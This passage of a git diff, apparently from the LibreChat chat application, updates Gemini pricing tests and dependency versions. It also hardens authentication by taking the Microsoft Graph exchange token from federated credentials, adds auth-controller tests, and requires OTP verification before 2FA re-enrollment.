expect(getPremiumRate(premiumKey, 'prompt', aboveThreshold)).toBe(premiumEntry.prompt);
|
||||||
|
expect(getPremiumRate(premiumKey, 'completion', aboveThreshold)).toBe(premiumEntry.completion);
|
||||||
|
expect(getPremiumRate(premiumKey, 'prompt', wellAboveThreshold)).toBe(premiumEntry.prompt);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return null from getPremiumRate when inputTokenCount is undefined or null', () => {
|
||||||
|
expect(getPremiumRate(premiumKey, 'prompt', undefined)).toBeNull();
|
||||||
|
expect(getPremiumRate(premiumKey, 'prompt', null)).toBeNull();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return standard rate from getMultiplier when inputTokenCount is below threshold', () => {
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview',
|
||||||
|
tokenType: 'prompt',
|
||||||
|
inputTokenCount: belowThreshold,
|
||||||
|
}),
|
||||||
|
).toBe(tokenValues[premiumKey].prompt);
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview',
|
||||||
|
tokenType: 'completion',
|
||||||
|
inputTokenCount: belowThreshold,
|
||||||
|
}),
|
||||||
|
).toBe(tokenValues[premiumKey].completion);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return premium rate from getMultiplier when inputTokenCount exceeds threshold', () => {
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview',
|
||||||
|
tokenType: 'prompt',
|
||||||
|
inputTokenCount: aboveThreshold,
|
||||||
|
}),
|
||||||
|
).toBe(premiumEntry.prompt);
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview',
|
||||||
|
tokenType: 'completion',
|
||||||
|
inputTokenCount: aboveThreshold,
|
||||||
|
}),
|
||||||
|
).toBe(premiumEntry.completion);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return standard rate from getMultiplier when inputTokenCount is exactly at threshold', () => {
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview',
|
||||||
|
tokenType: 'prompt',
|
||||||
|
inputTokenCount: threshold,
|
||||||
|
}),
|
||||||
|
).toBe(tokenValues[premiumKey].prompt);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should apply premium pricing to customtools variant above threshold', () => {
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview-customtools',
|
||||||
|
tokenType: 'prompt',
|
||||||
|
inputTokenCount: aboveThreshold,
|
||||||
|
}),
|
||||||
|
).toBe(premiumEntry.prompt);
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview-customtools',
|
||||||
|
tokenType: 'completion',
|
||||||
|
inputTokenCount: aboveThreshold,
|
||||||
|
}),
|
||||||
|
).toBe(premiumEntry.completion);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should use standard rate when inputTokenCount is not provided', () => {
|
||||||
|
expect(getMultiplier({ model: 'gemini-3.1-pro-preview', tokenType: 'prompt' })).toBe(
|
||||||
|
tokenValues[premiumKey].prompt,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'gemini-3.1-pro-preview', tokenType: 'completion' })).toBe(
|
||||||
|
tokenValues[premiumKey].completion,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should apply premium pricing through getMultiplier with valueKey path', () => {
|
||||||
|
const valueKey = getValueKey('gemini-3.1-pro-preview');
|
||||||
|
expect(valueKey).toBe(premiumKey);
|
||||||
|
expect(getMultiplier({ valueKey, tokenType: 'prompt', inputTokenCount: aboveThreshold })).toBe(
|
||||||
|
premiumEntry.prompt,
|
||||||
|
);
|
||||||
|
expect(
|
||||||
|
getMultiplier({ valueKey, tokenType: 'completion', inputTokenCount: aboveThreshold }),
|
||||||
|
).toBe(premiumEntry.completion);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should apply standard pricing through getMultiplier with valueKey path when below threshold', () => {
|
||||||
|
const valueKey = getValueKey('gemini-3.1-pro-preview');
|
||||||
|
expect(getMultiplier({ valueKey, tokenType: 'prompt', inputTokenCount: belowThreshold })).toBe(
|
||||||
|
tokenValues[premiumKey].prompt,
|
||||||
|
);
|
||||||
|
expect(
|
||||||
|
getMultiplier({ valueKey, tokenType: 'completion', inputTokenCount: belowThreshold }),
|
||||||
|
).toBe(tokenValues[premiumKey].completion);
|
||||||
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
describe('Grok Model Tests - Pricing', () => {
|
describe('Grok Model Tests - Pricing', () => {
|
||||||
|
|
|
||||||
|
|
@ -1,6 +1,6 @@
|
||||||
{
|
{
|
||||||
"name": "@librechat/backend",
|
"name": "@librechat/backend",
|
||||||
"version": "v0.8.3-rc1",
|
"version": "v0.8.3",
|
||||||
"description": "",
|
"description": "",
|
||||||
"scripts": {
|
"scripts": {
|
||||||
"start": "echo 'please run this from the root directory'",
|
"start": "echo 'please run this from the root directory'",
|
||||||
|
|
@ -44,13 +44,14 @@
|
||||||
"@google/genai": "^1.19.0",
|
"@google/genai": "^1.19.0",
|
||||||
"@keyv/redis": "^4.3.3",
|
"@keyv/redis": "^4.3.3",
|
||||||
"@langchain/core": "^0.3.80",
|
"@langchain/core": "^0.3.80",
|
||||||
"@librechat/agents": "^3.1.50",
|
"@librechat/agents": "^3.1.56",
|
||||||
"@librechat/api": "*",
|
"@librechat/api": "*",
|
||||||
"@librechat/data-schemas": "*",
|
"@librechat/data-schemas": "*",
|
||||||
"@microsoft/microsoft-graph-client": "^3.0.7",
|
"@microsoft/microsoft-graph-client": "^3.0.7",
|
||||||
"@modelcontextprotocol/sdk": "^1.26.0",
|
"@modelcontextprotocol/sdk": "^1.27.1",
|
||||||
"@node-saml/passport-saml": "^5.1.0",
|
"@node-saml/passport-saml": "^5.1.0",
|
||||||
"@smithy/node-http-handler": "^4.4.5",
|
"@smithy/node-http-handler": "^4.4.5",
|
||||||
|
"ai-tokenizer": "^1.0.6",
|
||||||
"axios": "^1.13.5",
|
"axios": "^1.13.5",
|
||||||
"bcryptjs": "^2.4.3",
|
"bcryptjs": "^2.4.3",
|
||||||
"compression": "^1.8.1",
|
"compression": "^1.8.1",
|
||||||
|
|
@ -63,10 +64,10 @@
|
||||||
"eventsource": "^3.0.2",
|
"eventsource": "^3.0.2",
|
||||||
"express": "^5.2.1",
|
"express": "^5.2.1",
|
||||||
"express-mongo-sanitize": "^2.2.0",
|
"express-mongo-sanitize": "^2.2.0",
|
||||||
"express-rate-limit": "^8.2.1",
|
"express-rate-limit": "^8.3.0",
|
||||||
"express-session": "^1.18.2",
|
"express-session": "^1.18.2",
|
||||||
"express-static-gzip": "^2.2.0",
|
"express-static-gzip": "^2.2.0",
|
||||||
"file-type": "^18.7.0",
|
"file-type": "^21.3.2",
|
||||||
"firebase": "^11.0.2",
|
"firebase": "^11.0.2",
|
||||||
"form-data": "^4.0.4",
|
"form-data": "^4.0.4",
|
||||||
"handlebars": "^4.7.7",
|
"handlebars": "^4.7.7",
|
||||||
|
|
@ -80,13 +81,14 @@
|
||||||
"klona": "^2.0.6",
|
"klona": "^2.0.6",
|
||||||
"librechat-data-provider": "*",
|
"librechat-data-provider": "*",
|
||||||
"lodash": "^4.17.23",
|
"lodash": "^4.17.23",
|
||||||
|
"mammoth": "^1.11.0",
|
||||||
"mathjs": "^15.1.0",
|
"mathjs": "^15.1.0",
|
||||||
"meilisearch": "^0.38.0",
|
"meilisearch": "^0.38.0",
|
||||||
"memorystore": "^1.6.7",
|
"memorystore": "^1.6.7",
|
||||||
"mime": "^3.0.0",
|
"mime": "^3.0.0",
|
||||||
"module-alias": "^2.2.3",
|
"module-alias": "^2.2.3",
|
||||||
"mongoose": "^8.12.1",
|
"mongoose": "^8.12.1",
|
||||||
"multer": "^2.0.2",
|
"multer": "^2.1.1",
|
||||||
"nanoid": "^3.3.7",
|
"nanoid": "^3.3.7",
|
||||||
"node-fetch": "^2.7.0",
|
"node-fetch": "^2.7.0",
|
||||||
"nodemailer": "^7.0.11",
|
"nodemailer": "^7.0.11",
|
||||||
|
|
@ -102,14 +104,15 @@
|
||||||
"passport-jwt": "^4.0.1",
|
"passport-jwt": "^4.0.1",
|
||||||
"passport-ldapauth": "^3.0.1",
|
"passport-ldapauth": "^3.0.1",
|
||||||
"passport-local": "^1.0.0",
|
"passport-local": "^1.0.0",
|
||||||
|
"pdfjs-dist": "^5.4.624",
|
||||||
"rate-limit-redis": "^4.2.0",
|
"rate-limit-redis": "^4.2.0",
|
||||||
"sharp": "^0.33.5",
|
"sharp": "^0.33.5",
|
||||||
"tiktoken": "^1.0.15",
|
|
||||||
"traverse": "^0.6.7",
|
"traverse": "^0.6.7",
|
||||||
"ua-parser-js": "^1.0.36",
|
"ua-parser-js": "^1.0.36",
|
||||||
"undici": "^7.18.2",
|
"undici": "^7.24.1",
|
||||||
"winston": "^3.11.0",
|
"winston": "^3.11.0",
|
||||||
"winston-daily-rotate-file": "^5.0.0",
|
"winston-daily-rotate-file": "^5.0.0",
|
||||||
|
"xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz",
|
||||||
"zod": "^3.22.4"
|
"zod": "^3.22.4"
|
||||||
},
|
},
|
||||||
"devDependencies": {
|
"devDependencies": {
|
||||||
|
|
|
||||||
|
|
@ -35,7 +35,6 @@ const graphPropsToClean = [
|
||||||
'tools',
|
'tools',
|
||||||
'signal',
|
'signal',
|
||||||
'config',
|
'config',
|
||||||
'agentContexts',
|
|
||||||
'messages',
|
'messages',
|
||||||
'contentData',
|
'contentData',
|
||||||
'stepKeyIds',
|
'stepKeyIds',
|
||||||
|
|
@ -277,7 +276,16 @@ function disposeClient(client) {
|
||||||
|
|
||||||
if (client.run) {
|
if (client.run) {
|
||||||
if (client.run.Graph) {
|
if (client.run.Graph) {
|
||||||
|
if (typeof client.run.Graph.clearHeavyState === 'function') {
|
||||||
|
client.run.Graph.clearHeavyState();
|
||||||
|
} else {
|
||||||
client.run.Graph.resetValues();
|
client.run.Graph.resetValues();
|
||||||
|
}
|
||||||
|
|
||||||
|
if (client.run.Graph.agentContexts) {
|
||||||
|
client.run.Graph.agentContexts.clear();
|
||||||
|
client.run.Graph.agentContexts = null;
|
||||||
|
}
|
||||||
|
|
||||||
graphPropsToClean.forEach((prop) => {
|
graphPropsToClean.forEach((prop) => {
|
||||||
if (client.run.Graph[prop] !== undefined) {
|
if (client.run.Graph[prop] !== undefined) {
|
||||||
|
|
|
||||||
|
|
@ -18,7 +18,7 @@ const {
|
||||||
findUser,
|
findUser,
|
||||||
} = require('~/models');
|
} = require('~/models');
|
||||||
const { getGraphApiToken } = require('~/server/services/GraphTokenService');
|
const { getGraphApiToken } = require('~/server/services/GraphTokenService');
|
||||||
const { getOpenIdConfig } = require('~/strategies');
|
const { getOpenIdConfig, getOpenIdEmail } = require('~/strategies');
|
||||||
|
|
||||||
const registrationController = async (req, res) => {
|
const registrationController = async (req, res) => {
|
||||||
try {
|
try {
|
||||||
|
|
@ -87,7 +87,7 @@ const refreshController = async (req, res) => {
|
||||||
const claims = tokenset.claims();
|
const claims = tokenset.claims();
|
||||||
const { user, error, migration } = await findOpenIDUser({
|
const { user, error, migration } = await findOpenIDUser({
|
||||||
findUser,
|
findUser,
|
||||||
email: claims.email,
|
email: getOpenIdEmail(claims),
|
||||||
openidId: claims.sub,
|
openidId: claims.sub,
|
||||||
idOnTheSource: claims.oid,
|
idOnTheSource: claims.oid,
|
||||||
strategyName: 'refreshController',
|
strategyName: 'refreshController',
|
||||||
|
|
@ -196,15 +196,6 @@ const graphTokenController = async (req, res) => {
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
// Extract access token from Authorization header
|
|
||||||
const authHeader = req.headers.authorization;
|
|
||||||
if (!authHeader || !authHeader.startsWith('Bearer ')) {
|
|
||||||
return res.status(401).json({
|
|
||||||
message: 'Valid authorization token required',
|
|
||||||
});
|
|
||||||
}
|
|
||||||
|
|
||||||
// Get scopes from query parameters
|
|
||||||
const scopes = req.query.scopes;
|
const scopes = req.query.scopes;
|
||||||
if (!scopes) {
|
if (!scopes) {
|
||||||
return res.status(400).json({
|
return res.status(400).json({
|
||||||
|
|
@ -212,7 +203,13 @@ const graphTokenController = async (req, res) => {
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
const accessToken = authHeader.substring(7); // Remove 'Bearer ' prefix
|
const accessToken = req.user.federatedTokens?.access_token;
|
||||||
|
if (!accessToken) {
|
||||||
|
return res.status(401).json({
|
||||||
|
message: 'No federated access token available for token exchange',
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
const tokenResponse = await getGraphApiToken(req.user, accessToken, scopes);
|
const tokenResponse = await getGraphApiToken(req.user, accessToken, scopes);
|
||||||
|
|
||||||
res.json(tokenResponse);
|
res.json(tokenResponse);
|
||||||
|
|
|
||||||
302
api/server/controllers/AuthController.spec.js
Normal file
302
api/server/controllers/AuthController.spec.js
Normal file
|
|
@ -0,0 +1,302 @@
|
||||||
|
jest.mock('@librechat/data-schemas', () => ({
|
||||||
|
logger: { error: jest.fn(), debug: jest.fn(), warn: jest.fn(), info: jest.fn() },
|
||||||
|
}));
|
||||||
|
jest.mock('~/server/services/GraphTokenService', () => ({
|
||||||
|
getGraphApiToken: jest.fn(),
|
||||||
|
}));
|
||||||
|
jest.mock('~/server/services/AuthService', () => ({
|
||||||
|
requestPasswordReset: jest.fn(),
|
||||||
|
setOpenIDAuthTokens: jest.fn(),
|
||||||
|
resetPassword: jest.fn(),
|
||||||
|
setAuthTokens: jest.fn(),
|
||||||
|
registerUser: jest.fn(),
|
||||||
|
}));
|
||||||
|
jest.mock('~/strategies', () => ({ getOpenIdConfig: jest.fn(), getOpenIdEmail: jest.fn() }));
|
||||||
|
jest.mock('openid-client', () => ({ refreshTokenGrant: jest.fn() }));
|
||||||
|
jest.mock('~/models', () => ({
|
||||||
|
deleteAllUserSessions: jest.fn(),
|
||||||
|
getUserById: jest.fn(),
|
||||||
|
findSession: jest.fn(),
|
||||||
|
updateUser: jest.fn(),
|
||||||
|
findUser: jest.fn(),
|
||||||
|
}));
|
||||||
|
jest.mock('@librechat/api', () => ({
|
||||||
|
isEnabled: jest.fn(),
|
||||||
|
findOpenIDUser: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
const openIdClient = require('openid-client');
|
||||||
|
const { isEnabled, findOpenIDUser } = require('@librechat/api');
|
||||||
|
const { graphTokenController, refreshController } = require('./AuthController');
|
||||||
|
const { getGraphApiToken } = require('~/server/services/GraphTokenService');
|
||||||
|
const { setOpenIDAuthTokens } = require('~/server/services/AuthService');
|
||||||
|
const { getOpenIdConfig, getOpenIdEmail } = require('~/strategies');
|
||||||
|
const { updateUser } = require('~/models');
|
||||||
|
|
||||||
|
describe('graphTokenController', () => {
|
||||||
|
let req, res;
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
isEnabled.mockReturnValue(true);
|
||||||
|
|
||||||
|
req = {
|
||||||
|
user: {
|
||||||
|
openidId: 'oid-123',
|
||||||
|
provider: 'openid',
|
||||||
|
federatedTokens: {
|
||||||
|
access_token: 'federated-access-token',
|
||||||
|
id_token: 'federated-id-token',
|
||||||
|
},
|
||||||
|
},
|
||||||
|
headers: { authorization: 'Bearer app-jwt-which-is-id-token' },
|
||||||
|
query: { scopes: 'https://graph.microsoft.com/.default' },
|
||||||
|
};
|
||||||
|
|
||||||
|
res = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
json: jest.fn(),
|
||||||
|
};
|
||||||
|
|
||||||
|
getGraphApiToken.mockResolvedValue({
|
||||||
|
access_token: 'graph-access-token',
|
||||||
|
token_type: 'Bearer',
|
||||||
|
expires_in: 3600,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should pass federatedTokens.access_token as OBO assertion, not the auth header bearer token', async () => {
|
||||||
|
await graphTokenController(req, res);
|
||||||
|
|
||||||
|
expect(getGraphApiToken).toHaveBeenCalledWith(
|
||||||
|
req.user,
|
||||||
|
'federated-access-token',
|
||||||
|
'https://graph.microsoft.com/.default',
|
||||||
|
);
|
||||||
|
expect(getGraphApiToken).not.toHaveBeenCalledWith(
|
||||||
|
expect.anything(),
|
||||||
|
'app-jwt-which-is-id-token',
|
||||||
|
expect.anything(),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return the graph token response on success', async () => {
|
||||||
|
await graphTokenController(req, res);
|
||||||
|
|
||||||
|
expect(res.json).toHaveBeenCalledWith({
|
||||||
|
access_token: 'graph-access-token',
|
||||||
|
token_type: 'Bearer',
|
||||||
|
expires_in: 3600,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 403 when user is not authenticated via Entra ID', async () => {
|
||||||
|
req.user.provider = 'google';
|
||||||
|
req.user.openidId = undefined;
|
||||||
|
|
||||||
|
await graphTokenController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(403);
|
||||||
|
expect(getGraphApiToken).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 403 when OPENID_REUSE_TOKENS is not enabled', async () => {
|
||||||
|
isEnabled.mockReturnValue(false);
|
||||||
|
|
||||||
|
await graphTokenController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(403);
|
||||||
|
expect(getGraphApiToken).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 400 when scopes query param is missing', async () => {
|
||||||
|
req.query.scopes = undefined;
|
||||||
|
|
||||||
|
await graphTokenController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(400);
|
||||||
|
expect(getGraphApiToken).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 401 when federatedTokens.access_token is missing', async () => {
|
||||||
|
req.user.federatedTokens = {};
|
||||||
|
|
||||||
|
await graphTokenController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(401);
|
||||||
|
expect(getGraphApiToken).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 401 when federatedTokens is absent entirely', async () => {
|
||||||
|
req.user.federatedTokens = undefined;
|
||||||
|
|
||||||
|
await graphTokenController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(401);
|
||||||
|
expect(getGraphApiToken).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 500 when getGraphApiToken throws', async () => {
|
||||||
|
getGraphApiToken.mockRejectedValue(new Error('OBO exchange failed'));
|
||||||
|
|
||||||
|
await graphTokenController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(500);
|
||||||
|
expect(res.json).toHaveBeenCalledWith({
|
||||||
|
message: 'Failed to obtain Microsoft Graph token',
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('refreshController – OpenID path', () => {
|
||||||
|
const mockTokenset = {
|
||||||
|
claims: jest.fn(),
|
||||||
|
access_token: 'new-access',
|
||||||
|
id_token: 'new-id',
|
||||||
|
refresh_token: 'new-refresh',
|
||||||
|
};
|
||||||
|
|
||||||
|
const baseClaims = {
|
||||||
|
sub: 'oidc-sub-123',
|
||||||
|
oid: 'oid-456',
|
||||||
|
email: 'user@example.com',
|
||||||
|
exp: 9999999999,
|
||||||
|
};
|
||||||
|
|
||||||
|
let req, res;
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
|
||||||
|
isEnabled.mockReturnValue(true);
|
||||||
|
getOpenIdConfig.mockReturnValue({ some: 'config' });
|
||||||
|
openIdClient.refreshTokenGrant.mockResolvedValue(mockTokenset);
|
||||||
|
mockTokenset.claims.mockReturnValue(baseClaims);
|
||||||
|
getOpenIdEmail.mockReturnValue(baseClaims.email);
|
||||||
|
setOpenIDAuthTokens.mockReturnValue('new-app-token');
|
||||||
|
updateUser.mockResolvedValue({});
|
||||||
|
|
||||||
|
req = {
|
||||||
|
headers: { cookie: 'token_provider=openid; refreshToken=stored-refresh' },
|
||||||
|
session: {},
|
||||||
|
};
|
||||||
|
|
||||||
|
res = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
send: jest.fn().mockReturnThis(),
|
||||||
|
redirect: jest.fn(),
|
||||||
|
};
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should call getOpenIdEmail with token claims and use result for findOpenIDUser', async () => {
|
||||||
|
const user = {
|
||||||
|
_id: 'user-db-id',
|
||||||
|
email: baseClaims.email,
|
||||||
|
openidId: baseClaims.sub,
|
||||||
|
};
|
||||||
|
findOpenIDUser.mockResolvedValue({ user, error: null, migration: false });
|
||||||
|
|
||||||
|
await refreshController(req, res);
|
||||||
|
|
||||||
|
expect(getOpenIdEmail).toHaveBeenCalledWith(baseClaims);
|
||||||
|
expect(findOpenIDUser).toHaveBeenCalledWith(
|
||||||
|
expect.objectContaining({ email: baseClaims.email }),
|
||||||
|
);
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should use OPENID_EMAIL_CLAIM-resolved value when claim is present in token', async () => {
|
||||||
|
const claimsWithUpn = { ...baseClaims, upn: 'user@corp.example.com' };
|
||||||
|
mockTokenset.claims.mockReturnValue(claimsWithUpn);
|
||||||
|
getOpenIdEmail.mockReturnValue('user@corp.example.com');
|
||||||
|
|
||||||
|
const user = {
|
||||||
|
_id: 'user-db-id',
|
||||||
|
email: 'user@corp.example.com',
|
||||||
|
openidId: baseClaims.sub,
|
||||||
|
};
|
||||||
|
findOpenIDUser.mockResolvedValue({ user, error: null, migration: false });
|
||||||
|
|
||||||
|
await refreshController(req, res);
|
||||||
|
|
||||||
|
expect(getOpenIdEmail).toHaveBeenCalledWith(claimsWithUpn);
|
||||||
|
expect(findOpenIDUser).toHaveBeenCalledWith(
|
||||||
|
expect.objectContaining({ email: 'user@corp.example.com' }),
|
||||||
|
);
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should fall back to claims.email when configured claim is absent from token claims', async () => {
|
||||||
|
getOpenIdEmail.mockReturnValue(baseClaims.email);
|
||||||
|
|
||||||
|
const user = {
|
||||||
|
_id: 'user-db-id',
|
||||||
|
email: baseClaims.email,
|
||||||
|
openidId: baseClaims.sub,
|
||||||
|
};
|
||||||
|
findOpenIDUser.mockResolvedValue({ user, error: null, migration: false });
|
||||||
|
|
||||||
|
await refreshController(req, res);
|
||||||
|
|
||||||
|
expect(findOpenIDUser).toHaveBeenCalledWith(
|
||||||
|
expect.objectContaining({ email: baseClaims.email }),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should update openidId when migration is triggered on refresh', async () => {
|
||||||
|
const user = { _id: 'user-db-id', email: baseClaims.email, openidId: null };
|
||||||
|
findOpenIDUser.mockResolvedValue({ user, error: null, migration: true });
|
||||||
|
|
||||||
|
await refreshController(req, res);
|
||||||
|
|
||||||
|
expect(updateUser).toHaveBeenCalledWith(
|
||||||
|
'user-db-id',
|
||||||
|
expect.objectContaining({ provider: 'openid', openidId: baseClaims.sub }),
|
||||||
|
);
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 401 and redirect to /login when findOpenIDUser returns no user', async () => {
|
||||||
|
findOpenIDUser.mockResolvedValue({ user: null, error: null, migration: false });
|
||||||
|
|
||||||
|
await refreshController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(401);
|
||||||
|
expect(res.redirect).toHaveBeenCalledWith('/login');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 401 and redirect when findOpenIDUser returns an error', async () => {
|
||||||
|
findOpenIDUser.mockResolvedValue({ user: null, error: 'AUTH_FAILED', migration: false });
|
||||||
|
|
||||||
|
await refreshController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(401);
|
||||||
|
expect(res.redirect).toHaveBeenCalledWith('/login');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should skip OpenID path when token_provider is not openid', async () => {
|
||||||
|
req.headers.cookie = 'token_provider=local; refreshToken=some-token';
|
||||||
|
|
||||||
|
await refreshController(req, res);
|
||||||
|
|
||||||
|
expect(openIdClient.refreshTokenGrant).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should skip OpenID path when OPENID_REUSE_TOKENS is disabled', async () => {
|
||||||
|
isEnabled.mockReturnValue(false);
|
||||||
|
|
||||||
|
await refreshController(req, res);
|
||||||
|
|
||||||
|
expect(openIdClient.refreshTokenGrant).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 200 with token not provided when refresh token is absent', async () => {
|
||||||
|
req.headers.cookie = 'token_provider=openid';
|
||||||
|
req.session = {};
|
||||||
|
|
||||||
|
await refreshController(req, res);
|
||||||
|
|
||||||
|
expect(res.status).toHaveBeenCalledWith(200);
|
||||||
|
expect(res.send).toHaveBeenCalledWith('Refresh token not provided');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -1,5 +1,6 @@
|
||||||
const { encryptV3, logger } = require('@librechat/data-schemas');
|
const { encryptV3, logger } = require('@librechat/data-schemas');
|
||||||
const {
|
const {
|
||||||
|
verifyOTPOrBackupCode,
|
||||||
generateBackupCodes,
|
generateBackupCodes,
|
||||||
generateTOTPSecret,
|
generateTOTPSecret,
|
||||||
verifyBackupCode,
|
verifyBackupCode,
|
||||||
|
|
@ -13,24 +14,42 @@ const safeAppTitle = (process.env.APP_TITLE || 'LibreChat').replace(/\s+/g, '');
|
||||||
/**
|
/**
|
||||||
* Enable 2FA for the user by generating a new TOTP secret and backup codes.
|
* Enable 2FA for the user by generating a new TOTP secret and backup codes.
|
||||||
* The secret is encrypted and stored, and 2FA is marked as disabled until confirmed.
|
* The secret is encrypted and stored, and 2FA is marked as disabled until confirmed.
|
||||||
|
* If 2FA is already enabled, requires OTP or backup code verification to re-enroll.
|
||||||
*/
|
*/
|
||||||
const enable2FA = async (req, res) => {
|
const enable2FA = async (req, res) => {
|
||||||
try {
|
try {
|
||||||
const userId = req.user.id;
|
const userId = req.user.id;
|
||||||
const secret = generateTOTPSecret();
|
const existingUser = await getUserById(
|
||||||
const { plainCodes, codeObjects } = await generateBackupCodes();
|
userId,
|
||||||
|
'+totpSecret +backupCodes _id twoFactorEnabled email',
|
||||||
|
);
|
||||||
|
|
||||||
// Encrypt the secret with v3 encryption before saving.
|
if (existingUser && existingUser.twoFactorEnabled) {
|
||||||
const encryptedSecret = encryptV3(secret);
|
const { token, backupCode } = req.body;
|
||||||
|
const result = await verifyOTPOrBackupCode({
|
||||||
// Update the user record: store the secret & backup codes and set twoFactorEnabled to false.
|
user: existingUser,
|
||||||
const user = await updateUser(userId, {
|
token,
|
||||||
totpSecret: encryptedSecret,
|
backupCode,
|
||||||
backupCodes: codeObjects,
|
persistBackupUse: false,
|
||||||
twoFactorEnabled: false,
|
|
||||||
});
|
});
|
||||||
|
|
||||||
const otpauthUrl = `otpauth://totp/${safeAppTitle}:${user.email}?secret=${secret}&issuer=${safeAppTitle}`;
|
if (!result.verified) {
|
||||||
|
const msg = result.message ?? 'TOTP token or backup code is required to re-enroll 2FA';
|
||||||
|
return res.status(result.status ?? 400).json({ message: msg });
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
const secret = generateTOTPSecret();
|
||||||
|
const { plainCodes, codeObjects } = await generateBackupCodes();
|
||||||
|
const encryptedSecret = encryptV3(secret);
|
||||||
|
|
||||||
|
const user = await updateUser(userId, {
|
||||||
|
pendingTotpSecret: encryptedSecret,
|
||||||
|
pendingBackupCodes: codeObjects,
|
||||||
|
});
|
||||||
|
|
||||||
|
const email = user.email || (existingUser && existingUser.email) || '';
|
||||||
|
const otpauthUrl = `otpauth://totp/${safeAppTitle}:${email}?secret=${secret}&issuer=${safeAppTitle}`;
|
||||||
|
|
||||||
return res.status(200).json({ otpauthUrl, backupCodes: plainCodes });
|
return res.status(200).json({ otpauthUrl, backupCodes: plainCodes });
|
||||||
} catch (err) {
|
} catch (err) {
|
||||||
|
|
@ -46,13 +65,14 @@ const verify2FA = async (req, res) => {
|
||||||
try {
|
try {
|
||||||
const userId = req.user.id;
|
const userId = req.user.id;
|
||||||
const { token, backupCode } = req.body;
|
const { token, backupCode } = req.body;
|
||||||
const user = await getUserById(userId, '_id totpSecret backupCodes');
|
const user = await getUserById(userId, '+totpSecret +pendingTotpSecret +backupCodes _id');
|
||||||
|
const secretSource = user?.pendingTotpSecret ?? user?.totpSecret;
|
||||||
|
|
||||||
if (!user || !user.totpSecret) {
|
if (!user || !secretSource) {
|
||||||
return res.status(400).json({ message: '2FA not initiated' });
|
return res.status(400).json({ message: '2FA not initiated' });
|
||||||
}
|
}
|
||||||
|
|
||||||
const secret = await getTOTPSecret(user.totpSecret);
|
const secret = await getTOTPSecret(secretSource);
|
||||||
let isVerified = false;
|
let isVerified = false;
|
||||||
|
|
||||||
if (token) {
|
if (token) {
|
||||||
|
|
@ -78,15 +98,28 @@ const confirm2FA = async (req, res) => {
|
||||||
try {
|
try {
|
||||||
const userId = req.user.id;
|
const userId = req.user.id;
|
||||||
const { token } = req.body;
|
